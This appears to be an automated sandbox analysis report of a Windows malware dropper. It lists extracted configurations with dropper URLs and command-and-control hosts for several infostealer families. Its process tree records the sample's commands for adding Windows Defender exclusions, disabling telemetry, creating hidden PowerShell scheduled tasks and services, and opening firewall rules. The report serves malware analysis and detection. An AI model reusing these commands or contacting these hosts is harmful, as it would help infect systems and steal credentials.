Analysis

  • max time kernel
    70s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    11-03-2022 23:54

General

  • Target

    accf83b613404a2148dd072534eff8a2a7df652da73ea29f23e7086c59986a23.exe

  • Size

    3.2MB

  • MD5

    b34dc8ca6d3a933b4e4479021cd5ae1a

  • SHA1

    b55b712901b8ae287ceb9e52db2cc4e8a13ddff7

  • SHA256

    accf83b613404a2148dd072534eff8a2a7df652da73ea29f23e7086c59986a23

  • SHA512

    e189206c71661324910af556aa8b7b22f93774670ed389e3ae6024ccde85827a373820d24f22601ca707cb17be7e1e74eb552e814d6c11615d27fbf17faed93e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

DomAni2

C2

flestriche.xyz:80

Extracted

Family

raccoon

Botnet

5e952d9d2bbe82643afb1857a7befd7377f3a063

Attributes
  • url4cnc

    http://185.3.95.153/sbjoahera

    http://185.163.204.22/sbjoahera

    https://t.me/sbjoahera

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

Lyla2

C2

bonezarisor.xyz:80

Attributes
  • auth_value

    de2a98abc502b86b809fbc366af9256a

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 26 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\accf83b613404a2148dd072534eff8a2a7df652da73ea29f23e7086c59986a23.exe
    "C:\Users\Admin\AppData\Local\Temp\accf83b613404a2148dd072534eff8a2a7df652da73ea29f23e7086c59986a23.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4436
      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4996
          • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_1.exe
            sonia_1.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:5000
            • C:\Windows\SysWOW64\rUNdlL32.eXe
              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
              6⤵
              • Loads dropped DLL
              PID:4636
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 608
                7⤵
                • Program crash
                PID:836
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_8.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1680
          • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_8.exe
            sonia_8.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_8.exe
              C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_8.exe
              6⤵
              • Executes dropped EXE
              PID:424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_7.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4168
          • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_7.exe
            sonia_7.exe
            5⤵
            • Executes dropped EXE
            PID:1032
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3440
          • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_6.exe
            sonia_6.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:2792
            • C:\Users\Admin\Documents\WzdnIKo2qh3fELXaKdXhAV8d.exe
              "C:\Users\Admin\Documents\WzdnIKo2qh3fELXaKdXhAV8d.exe"
              6⤵
              • Executes dropped EXE
              PID:1096
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 1260
                7⤵
                • Program crash
                PID:3148
            • C:\Users\Admin\Documents\3jeIIENje9yRBotvvR8xNyQm.exe
              "C:\Users\Admin\Documents\3jeIIENje9yRBotvvR8xNyQm.exe"
              6⤵
              • Executes dropped EXE
              PID:3668
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                7⤵
                  PID:2396
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd
                    8⤵
                      PID:4160
                • C:\Users\Admin\Documents\oBf2zitf_mDw8ifdyUmIyix1.exe
                  "C:\Users\Admin\Documents\oBf2zitf_mDw8ifdyUmIyix1.exe"
                  6⤵
                    PID:2788
                  • C:\Users\Admin\Documents\9CnUpuMsoBE83NtTY86pfnyc.exe
                    "C:\Users\Admin\Documents\9CnUpuMsoBE83NtTY86pfnyc.exe"
                    6⤵
                      PID:4712
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im 9CnUpuMsoBE83NtTY86pfnyc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\9CnUpuMsoBE83NtTY86pfnyc.exe" & del C:\ProgramData\*.dll & exit
                        7⤵
                          PID:5408
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im 9CnUpuMsoBE83NtTY86pfnyc.exe /f
                            8⤵
                            • Kills process with taskkill
                            PID:5128
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 6
                            8⤵
                            • Delays execution with timeout.exe
                            PID:5716
                      • C:\Users\Admin\Documents\2WcPh8QpGXroLtJqkcv0M1Q0.exe
                        "C:\Users\Admin\Documents\2WcPh8QpGXroLtJqkcv0M1Q0.exe"
                        6⤵
                          PID:5092
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 432
                            7⤵
                            • Program crash
                            PID:3284
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 440
                            7⤵
                            • Program crash
                            PID:2420
                        • C:\Users\Admin\Documents\kv2dKevs6Dl0qvNxLxTIlZaa.exe
                          "C:\Users\Admin\Documents\kv2dKevs6Dl0qvNxLxTIlZaa.exe"
                          6⤵
                            PID:2984
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                              7⤵
                                PID:1312
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 608
                                7⤵
                                • Program crash
                                PID:2852
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 920
                                7⤵
                                • Program crash
                                PID:4640
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1044
                                7⤵
                                • Program crash
                                PID:5328
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                7⤵
                                  PID:5028
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1052
                                  7⤵
                                  • Program crash
                                  PID:5416
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1080
                                  7⤵
                                  • Program crash
                                  PID:4172
                              • C:\Users\Admin\Documents\pt7AN9CnPURR_0wLbFbLotgG.exe
                                "C:\Users\Admin\Documents\pt7AN9CnPURR_0wLbFbLotgG.exe"
                                6⤵
                                  PID:1496
                                  • C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe
                                    .\Install.exe
                                    7⤵
                                      PID:3016
                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D4D.tmp\Install.exe
                                        .\Install.exe /S /site_id "525403"
                                        8⤵
                                          PID:4820
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                            9⤵
                                              PID:440
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                10⤵
                                                  PID:4736
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                    11⤵
                                                      PID:5064
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                      11⤵
                                                        PID:2192
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                    9⤵
                                                      PID:4140
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                        10⤵
                                                          PID:2756
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                            11⤵
                                                              PID:5196
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                              11⤵
                                                                PID:3132
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "gzYbuQJbj" /SC once /ST 00:02:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                            9⤵
                                                            • Creates scheduled task(s)
                                                            PID:2324
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "gzYbuQJbj"
                                                            9⤵
                                                              PID:5220
                                                      • C:\Users\Admin\Documents\4jdUiCGdDh5_fohnQKAcvuuC.exe
                                                        "C:\Users\Admin\Documents\4jdUiCGdDh5_fohnQKAcvuuC.exe"
                                                        6⤵
                                                          PID:1876
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                                                            7⤵
                                                              PID:1344
                                                              • C:\Windows\system32\mode.com
                                                                mode 65,10
                                                                8⤵
                                                                  PID:4060
                                                                • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                  7z.exe e file.zip -p320791618516055 -oextracted
                                                                  8⤵
                                                                    PID:2408
                                                                  • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                    7z.exe e extracted/file_9.zip -oextracted
                                                                    8⤵
                                                                      PID:5452
                                                                • C:\Users\Admin\Documents\n37h6G6pxBCE2DoGCqYuzGt8.exe
                                                                  "C:\Users\Admin\Documents\n37h6G6pxBCE2DoGCqYuzGt8.exe"
                                                                  6⤵
                                                                    PID:632
                                                                    • C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
                                                                      7⤵
                                                                        PID:2508
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        7⤵
                                                                          PID:3980
                                                                      • C:\Users\Admin\Documents\t5vgEYEaWRhyLuZqrE2bKd1v.exe
                                                                        "C:\Users\Admin\Documents\t5vgEYEaWRhyLuZqrE2bKd1v.exe"
                                                                        6⤵
                                                                          PID:4852
                                                                          • C:\Users\Admin\AppData\Local\Temp\0D961.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\0D961.exe"
                                                                            7⤵
                                                                              PID:4304
                                                                            • C:\Users\Admin\AppData\Local\Temp\45KEC.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\45KEC.exe"
                                                                              7⤵
                                                                                PID:204
                                                                              • C:\Users\Admin\AppData\Local\Temp\4IEG6.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\4IEG6.exe"
                                                                                7⤵
                                                                                  PID:5020
                                                                                • C:\Users\Admin\AppData\Local\Temp\68DA5.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\68DA5.exe"
                                                                                  7⤵
                                                                                    PID:216
                                                                                  • C:\Users\Admin\AppData\Local\Temp\B01I0.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\B01I0.exe"
                                                                                    7⤵
                                                                                      PID:1632
                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                        "C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
                                                                                        8⤵
                                                                                          PID:5320
                                                                                      • C:\Users\Admin\AppData\Local\Temp\B01I0221H4F46C5.exe
                                                                                        https://iplogger.org/1nChi7
                                                                                        7⤵
                                                                                          PID:4176
                                                                                      • C:\Users\Admin\Documents\t1YXHcOhAf0ogZJrpSRDHiDD.exe
                                                                                        "C:\Users\Admin\Documents\t1YXHcOhAf0ogZJrpSRDHiDD.exe"
                                                                                        6⤵
                                                                                          PID:2152
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hjetuyka\
                                                                                            7⤵
                                                                                              PID:4240
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\beutmovy.exe" C:\Windows\SysWOW64\hjetuyka\
                                                                                              7⤵
                                                                                                PID:4660
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                "C:\Windows\System32\sc.exe" create hjetuyka binPath= "C:\Windows\SysWOW64\hjetuyka\beutmovy.exe /d\"C:\Users\Admin\Documents\t1YXHcOhAf0ogZJrpSRDHiDD.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                7⤵
                                                                                                  PID:2592
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  "C:\Windows\System32\sc.exe" description hjetuyka "wifi internet conection"
                                                                                                  7⤵
                                                                                                    PID:2096
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    "C:\Windows\System32\sc.exe" start hjetuyka
                                                                                                    7⤵
                                                                                                      PID:3416
                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                      7⤵
                                                                                                        PID:5200
                                                                                                      • C:\Users\Admin\nawyvzah.exe
                                                                                                        "C:\Users\Admin\nawyvzah.exe" /d"C:\Users\Admin\Documents\t1YXHcOhAf0ogZJrpSRDHiDD.exe"
                                                                                                        7⤵
                                                                                                          PID:5312
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1775.bat" "
                                                                                                            8⤵
                                                                                                              PID:3436
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 1044
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:5144
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 1040
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:5476
                                                                                                        • C:\Users\Admin\Documents\zQgJGSf6ZJaebJrzEf2VXDFU.exe
                                                                                                          "C:\Users\Admin\Documents\zQgJGSf6ZJaebJrzEf2VXDFU.exe"
                                                                                                          6⤵
                                                                                                            PID:2268
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 440
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:5064
                                                                                                          • C:\Users\Admin\Documents\Cvf3NVcnrWJoDfQsMhmclZVb.exe
                                                                                                            "C:\Users\Admin\Documents\Cvf3NVcnrWJoDfQsMhmclZVb.exe"
                                                                                                            6⤵
                                                                                                              PID:1312
                                                                                                            • C:\Users\Admin\Documents\1Z33WxNGa5hzvgnnaJD03T4m.exe
                                                                                                              "C:\Users\Admin\Documents\1Z33WxNGa5hzvgnnaJD03T4m.exe"
                                                                                                              6⤵
                                                                                                                PID:1944
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 452
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:2384
                                                                                                              • C:\Users\Admin\Documents\8Dz1HsD8x1jIoTIDCSKQgMnd.exe
                                                                                                                "C:\Users\Admin\Documents\8Dz1HsD8x1jIoTIDCSKQgMnd.exe"
                                                                                                                6⤵
                                                                                                                  PID:3908
                                                                                                                • C:\Users\Admin\Documents\AqjjoHHEAK_VVx8rMWIdGEW3.exe
                                                                                                                  "C:\Users\Admin\Documents\AqjjoHHEAK_VVx8rMWIdGEW3.exe"
                                                                                                                  6⤵
                                                                                                                    PID:684
                                                                                                                  • C:\Users\Admin\Documents\fS1vQL5xpCkOxpaCgkhXQOOn.exe
                                                                                                                    "C:\Users\Admin\Documents\fS1vQL5xpCkOxpaCgkhXQOOn.exe"
                                                                                                                    6⤵
                                                                                                                      PID:1328
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 644
                                                                                                                        7⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4060
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 652
                                                                                                                        7⤵
                                                                                                                        • Program crash
                                                                                                                        PID:1040
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 744
                                                                                                                        7⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5172
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 876
                                                                                                                        7⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5752
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1268
                                                                                                                        7⤵
                                                                                                                        • Program crash
                                                                                                                        PID:1700
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1276
                                                                                                                        7⤵
                                                                                                                        • Program crash
                                                                                                                        PID:2508
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1292
                                                                                                                        7⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5448
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "fS1vQL5xpCkOxpaCgkhXQOOn.exe" /f & erase "C:\Users\Admin\Documents\fS1vQL5xpCkOxpaCgkhXQOOn.exe" & exit
                                                                                                                        7⤵
                                                                                                                          PID:5700
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im "fS1vQL5xpCkOxpaCgkhXQOOn.exe" /f
                                                                                                                            8⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:6136
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1332
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5728
                                                                                                                      • C:\Users\Admin\Documents\DfH_jYCGTPtJc0Li02Rzb9Ba.exe
                                                                                                                        "C:\Users\Admin\Documents\DfH_jYCGTPtJc0Li02Rzb9Ba.exe"
                                                                                                                        6⤵
                                                                                                                          PID:1692
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\d19b052b-cade-4db9-8175-6211992e4e78.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\d19b052b-cade-4db9-8175-6211992e4e78.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5080
                                                                                                                          • C:\Users\Admin\Documents\C9uA8q8iVs3fs6KVRuE0XAtQ.exe
                                                                                                                            "C:\Users\Admin\Documents\C9uA8q8iVs3fs6KVRuE0XAtQ.exe"
                                                                                                                            6⤵
                                                                                                                              PID:2520
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RegSvc.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RegSvc.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:5232
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                                                                            4⤵
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:2836
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_5.exe
                                                                                                                              sonia_5.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4164
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                            4⤵
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:2468
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_4.exe
                                                                                                                              sonia_4.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:1020
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1780
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:768
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                                            4⤵
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:5056
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_3.exe
                                                                                                                              sonia_3.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Modifies system certificate store
                                                                                                                              PID:4000
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 1076
                                                                                                                                6⤵
                                                                                                                                • Program crash
                                                                                                                                PID:4988
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                                            4⤵
